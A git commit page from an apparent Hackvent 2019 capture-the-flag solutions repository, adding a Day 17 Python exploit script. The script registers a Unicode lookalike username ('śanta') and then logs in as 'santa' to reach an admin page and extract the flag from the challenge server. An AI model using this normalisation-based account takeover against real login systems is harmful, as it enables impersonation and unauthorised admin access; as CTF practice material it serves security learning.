Roman/Hackvent_2019
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Day17 code

Browse Source
This commit is contained in:
Roman Hergenreder
2019-12-29 15:24:39 +01:00
parent 7926b309e2
commit 5267a8d008
5 changed files with 40 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

33
Day 17/exploit.py Normal file
View File

@@ -0,0 +1,33 @@
#!/usr/bin/python
import requests
import random
import string
import re
BASE_URL = "http://whale.hacking-lab.com:8881"
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
SESSION = requests.session()
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
# 1. register user santa
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
if res.status_code != 200 or "Registration successful!" not in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print(res.text)
exit(1)
# 2. login
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print(res.text)
exit(1)
# 3. get flag
res = SESSION.get(BASE_URL + "/admin.php")
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
exit(1)
print(FLAG_PATTERN.search(res.text))

5
Day 17/source.phps Normal file
View File

File diff suppressed because one or more lines are too long